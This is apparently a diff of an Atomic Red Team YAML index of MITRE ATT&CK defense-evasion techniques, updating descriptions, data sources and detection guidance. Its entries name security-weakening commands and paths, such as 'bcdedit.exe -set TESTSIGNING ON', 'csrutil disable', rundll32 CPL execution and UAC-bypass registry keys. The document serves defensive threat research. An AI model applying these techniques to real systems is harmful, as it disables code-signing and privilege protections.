x_mitre_data_sources: + - 'File: File Metadata' + - 'File: File Content' + x_mitre_contributors: + - Martin Jirkal, ESET identifier: T1027.001 atomic_tests: - name: Pad Binary to Change Hash - Linux/macOS dd 
@@ -26919,31 +18847,82 @@ defense-evasion: of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis. x_mitre_data_sources: - - VBR - - MBR - - API monitoring + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - Windows atomic_tests: [] - T1548.002: + T1612: technique: - id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 - description: |- - Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) - - If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) - - Many methods have been discovered to bypass UAC. 
The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: - - * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) - - Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Account Control + id: attack-pattern--800f9819-7007-4540-a520-40e655876800 + description: "Adversaries may build a container image directly on a host to + bypass defenses that monitor for the retrieval of malicious images from a + public registry. A remote build request may be sent to the Docker + API that includes a Dockerfile that pulls a vanilla base image, such as alpine, + from a public or local registry and then builds a custom image upon it.(Citation: + Docker Build Image)\n\nAn adversary may take advantage of that build + API to build a custom image on the host that includes malware downloaded from + their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) + using that custom image.(Citation: Aqua Build Images on Hosts) If the base + image is pulled from a public registry, defenses will likely not detect the + image as malicious since it’s a vanilla image. If the base image already resides + in a local registry, the pull may be considered even less suspicious since + the image is already in the environment. 
" + name: Build Image on Host created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: + - source_name: mitre-attack + external_id: T1612 + url: https://attack.mitre.org/techniques/T1612 + - source_name: Docker Build Image + url: https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild + description: Docker. ( null). Docker Engine API v1.41 Reference - Build an + Image. Retrieved March 30, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-19T13:39:56.999Z' + created: '2021-03-30T17:54:03.944Z' + x_mitre_platforms: + - Containers + x_mitre_contributors: + - Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security + - Roi Kol, @roykol1, Team Nautilus Aqua Security + - Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security + - Vishwas Manral, McAfee + x_mitre_detection: Monitor for unexpected Docker image build requests to the + Docker daemon on hosts in the environment. Additionally monitor for subsequent + network communication with anomalous IPs that have never been seen before + in the environment that indicate the download of malicious code. 
+ x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Image: Image Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + atomic_tests: [] + T1548.002: + technique: + created: '2020-01-30T14:24:34.977Z' + modified: '2020-07-22T21:36:52.458Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: - source_name: mitre-attack external_id: T1548.002 url: https://attack.mitre.org/techniques/T1548/002 
@@ -26986,23 +18965,30 @@ defense-evasion: description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. source_name: enigma0x3 sdclt bypass - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-22T21:36:52.458Z' - created: '2020-01-30T14:24:34.977Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - - Casey Smith - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bypass User Account Control + description: |- + Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) + + If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. 
(Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) + + Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: + + * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) + + Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) + id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 + x_mitre_defense_bypassed: + - Windows User Account Control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + x_mitre_permissions_required: + - Administrator + - User x_mitre_detection: |- There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. 
Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. @@ -27013,15 +18999,16 @@ defense-evasion: * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) Analysts should monitor these Registry settings for unauthorized changes. - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '2.0' - x_mitre_defense_bypassed: - - Windows User Account Control + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Stefan Kanthak + - Casey Smith + x_mitre_platforms: + - Windows identifier: T1548.002 atomic_tests: - name: Bypass UAC using Event Viewer (cmd) @@ -27251,10 +19238,9 @@ defense-evasion: - Nik Seetharaman, Palantir - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_data_sources: - - Windows event logs - - Process use of network - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' x_mitre_defense_bypassed: - Anti-virus - Application control 
@@ -27399,10 +19385,10 @@ defense-evasion: COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.' x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -27594,10 +19580,9 @@ defense-evasion: Monitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command. x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - File monitoring - - Authentication logs + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Deletion' x_mitre_platforms: - Linux - macOS @@ -27805,9 +19790,9 @@ defense-evasion: or modification of indicator files. Also monitor for suspicious processes interacting with log files. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Deletion' + - 'File: File Modification' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -27918,10 +19903,8 @@ defense-evasion: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").' x_mitre_data_sources: - - API monitoring - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1070.001 
@@ -28026,20 +20009,17 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' + modified: '2021-03-16T12:45:15.399Z' created: '2020-03-13T20:36:57.378Z' x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - Azure AD - Office 365 + - SaaS + - IaaS + - Google Workspace x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours. @@ -28047,7 +20027,7 @@ defense-evasion: - User - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' atomic_tests: [] T1553.002: technique: @@ -28091,7 +20071,7 @@ defense-evasion: modified: '2020-02-10T19:51:01.601Z' created: '2020-02-05T16:27:37.784Z' x_mitre_data_sources: - - Binary file metadata + - 'File: File Metadata' x_mitre_defense_bypassed: - Windows User Account Control x_mitre_detection: Collect and analyze signing certificate metadata on software 
@@ -28103,6 +20083,114 @@ defense-evasion: - macOS - Windows atomic_tests: [] + T1553.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1553.006 + url: https://attack.mitre.org/techniques/T1553/006 + - source_name: Microsoft DSE June 2017 + url: https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2017, June 1). Digital Signatures for Kernel Modules + on Windows. Retrieved April 22, 2021. + - source_name: Apple Disable SIP + url: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection + description: Apple. (n.d.). Disabling and Enabling System Integrity Protection. + Retrieved April 22, 2021. + - source_name: Microsoft Unsigned Driver Apr 2017 + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test + description: Microsoft. (2017, April 20). Installing an Unsigned Driver during + Development and Test. Retrieved April 22, 2021. + - source_name: Microsoft TESTSIGNING Feb 2021 + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option + description: Microsoft. (2021, February 15). Enable Loading of Test Signed + Drivers. Retrieved April 22, 2021. + - source_name: FireEye HIKIT Rootkit Part 2 + url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.' + - source_name: GitHub Turla Driver Loader + url: https://github.com/hfiref0x/TDL + description: TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved + April 22, 2021. 
+ - url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf + description: 'F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence + of crimeware and APT attacks. Retrieved March 24, 2016.' + source_name: F-Secure BlackEnergy 2014 + - source_name: Unit42 AcidBox June 2020 + url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ + description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare + Malware Repurposing Turla Group Exploit Targeted Russian Organizations. + Retrieved March 16, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Code Signing Policy Modification + description: "Adversaries may modify code signing policies to enable execution + of unsigned or self-signed code. Code signing provides a level of authenticity + on a program from a developer and a guarantee that the program has not been + tampered with. Security controls can include enforcement mechanisms to ensure + that only valid, signed code can be run on an operating system. \n\nSome of + these security controls may be enabled by default, such as Driver Signature + Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: + Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls + may be disabled by default but are configurable through application controls, + such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a + system. 
Since it can be useful for developers to modify default signature + enforcement policies during the development and testing of applications, disabling + of these features may be possible with elevated permissions.(Citation: Microsoft + Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may + modify code signing policies in a number of ways, including through use of + command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), + rebooting the computer in a debug/recovery mode, or by altering the value + of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: + Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub + Turla Driver Loader) Examples of commands that can modify the code signing + policy of a system include bcdedit.exe -set TESTSIGNING ON on + Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING + Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful + modification of a signing policy may require reboot of the compromised system. + Additionally, some implementations can introduce visible artifacts for the + user (ex: a watermark in the corner of the screen stating the system is in + Test Mode). 
Adversaries may attempt to remove such artifacts.(Citation: F-Secure + BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related + to signature checks, such as modifying g_CiOptions to disable + Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege + Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but + vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla + Driver Loader)" + id: attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T15:41:39.155Z' + created: '2021-04-23T01:04:57.161Z' + x_mitre_detection: 'Monitor processes and command-line arguments for actions + that could be taken to modify the code signing policy of a system, such as + bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING + Feb 2021) Consider monitoring for modifications made to Registry keys associated + with code signing policies, such as HKCU\Software\Policies\Microsoft\Windows + NT\Driver Signing. Modifications to the code signing policy of a system + are likely to be rare.' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Abel Morales, Exabeam + x_mitre_defense_bypassed: + - Application control + - User Mode Signature Validation + - Digital Certificate Validation + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_platforms: + - Windows + - macOS + atomic_tests: [] T1027.004: technique: created: '2020-03-16T15:30:57.711Z' 
@@ -28141,9 +20229,10 @@ defense-evasion: - Praetorian - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring + - 'File: File Metadata' + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: 'Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator @@ -28290,9 +20379,9 @@ defense-evasion: x_mitre_is_subtechnique: true x_mitre_version: '1.0' x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_contributors: - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International identifier: T1218.001 @@ -28547,10 +20636,9 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Component firmware - - Process monitoring - - Disk forensics - - API monitoring + - 'Driver: Driver Metadata' + - 'Firmware: Firmware Modification' + - 'Process: OS API Execution' x_mitre_detection: |- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. 
@@ -28616,12 +20704,12 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Windows Registry - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: Process Creation' + - 'File: File Creation' + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: |- Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014) 
@@ -28704,21 +20792,16 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:48:08.299Z' + modified: '2021-03-08T10:33:02.034Z' created: '2020-05-14T14:45:15.978Z' x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Creation' x_mitre_permissions_required: - User x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity. @@ -28766,10 +20849,8 @@ defense-evasion: Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows atomic_tests: [] 
@@ -28803,7 +20884,7 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Create Snapshot description: |- - An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. + An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020) id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1 
@@ -28811,9 +20892,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:48:08.293Z' + modified: '2021-03-08T10:33:02.060Z' created: '2020-06-09T15:33:13.563Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User 
@@ -28826,39 +20907,23 @@ defense-evasion: Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot": parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM) x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Snapshot: Snapshot Creation' x_mitre_contributors: - Praetorian x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1574.001: technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - There are many ways an adversary can hijack DLL loads. 
Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. 
(Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. name: DLL Search Order Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -28874,10 +20939,18 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016. - source_name: OWASP Binary Planting + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. - source_name: Microsoft Security Advisory 2269637 url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved 
@@ -28886,32 +20959,41 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: Microsoft Manifests description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests + url: https://msdn.microsoft.com/en-US/library/aa375365 - source_name: FireEye DLL Search Order Hijacking url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' x_mitre_platforms: - Windows x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' x_mitre_detection: Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. + the same file name but abnormal paths. 
Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1574.001 atomic_tests: - name: DLL Search Order Hijacking - amsi.dll @@ -28935,6 +21017,16 @@ defense-evasion: elevation_required: true T1574.002: technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1574.002 @@ -28942,10 +21034,6 @@ defense-evasion: - external_id: CAPEC-641 source_name: capec url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - source_name: FireEye DLL Side-Loading url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in 
